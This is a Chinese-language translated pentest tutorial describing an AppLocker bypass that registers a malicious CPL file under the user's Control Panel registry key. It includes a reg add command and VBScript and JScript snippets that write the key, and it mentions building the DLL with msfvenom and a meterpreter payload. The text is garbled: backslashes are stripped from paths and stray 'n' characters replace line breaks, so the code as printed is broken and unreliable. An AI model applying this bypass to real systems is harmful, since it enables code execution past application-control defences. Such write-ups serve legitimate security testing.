繞過AppLocker系列之控制面板的利用

使用默認規則實現AppLocker不能提供任何充分的保護，因為通過使用合法的Windows二進位文件和利用常見的系統錯誤配置就會產生多個繞過方法。在Windows系統中，當用戶打開控制面板時，會載入多個CPL文件。這些CPL文件的列表是從註冊表中獲得的。

Francesco Mifsud 發現，當啟動控制面板時，將檢查以下兩個註冊表位置，然後載入CPL。

HKLMSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLsnHKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLsn

問題就出在第二個註冊表的位置，普通用戶具有寫入許可權，所以可以在註冊表中寫入一個註冊表鍵，該註冊表將在控制面板啟動時載入和執行惡意代碼。唯一的條件是用戶的系統允許打開控制面板和註冊表。註冊表二進位文件位於Windows文件夾內，默認情況下，AppLocker允許執行此文件夾內的所有內容。在大多數環境中也是允許控制面板運行的。

繞過AppLocker ——阻止 CMD 運行

第一步是創建一個DLL並將其重命名為.Cpl，以便它可以與控制面板一起執行。Metasploit 的Msfvenom可以創建一個自定義的DLL，其中可以包含一個嵌入的meterpreter有效負載或者Didier Stevens的 cmd DLL文件，可以用來繞過禁止cmd運行的限制。

以下命令將創建一個註冊表鍵，這個註冊表鍵的值將包含存儲在主機上的CPL文件的路徑。默認情況下，標準用戶對自己的配置單元是具有寫入許可權的。

reg add "HKCUSOFTWAREMicrosoftWindowsCurrentVersionControl PanelCpls"n/v pentestlab.cpl /t REG_SZ /d "C:pentestlab.cpl"n

繞過AppLocker —— 將註冊表鍵添加到註冊表

如果cmd被禁用，可以使用註冊表編輯器添加註冊表項：

註冊表編輯器 – 添加CPL註冊表鍵

Francesco Mifsud還發布了兩個腳本，可以在cmd和註冊表編輯器被阻止時將註冊表鍵添加到註冊表中。

VBScript：

const HKEY_CURRENT_USER = &H80000001n nstrComputer = "."n nSet objReg=GetObject(n"winmgmts:{impersonationLevel=impersonate}!" & strComputer & "rootdefault:StdRegProv")n nstrKeyPath = "SoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs"nobjReg.CreateKey HKEY_CURRENT_USER,strKeyPathn nstrValueName = "pentestlabCPL"nstrValue = "C:pentestlabCPL.cpl"nobjReg.SetStringValuenHKEY_CURRENT_USER,strKeyPath,strValueName,strValuen

Jscript：

var obj = WScript.CreateObject("WScript.Shell");nobj.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs", "Top level key");nobj.RegWrite("HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLspentestlabCPL", "C:pentestlabCPL.cpl","REG_SZ");n

從啟動控制面板的那一刻開始，代碼將被執行，cmd將被打開。

AppLocker Bypass – 通過控制面板命令提示符

在控制面板被阻止打開的情況下，可以使用以下位置作為啟動控制面板的替代方法。

· C:windowssystem32control.exen· AppDataRoamingMicrosoftWindowsStart MenuProgramsAccessoriesSystem ToolsControl Panel.lnkn· shell:::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}n· shell:::{26EE0668-A00A-44D7-9371-BEB064C98683}n· shell:::{ED7BA470-8E54-465E-825C-99712043E01C}n· My Control Panel.{ED7BA470-8E54-465E-825C-99712043E01C}n

資源

Applocker Bypass via Registry Key Manipulation

本文翻譯自：AppLocker Bypass – Control Panel ，如若轉載，請註明來源於嘶吼： 繞過AppLocker系列之控制面板的利用 更多內容請關注「嘶吼專業版」——Pro4hou

推薦閱讀：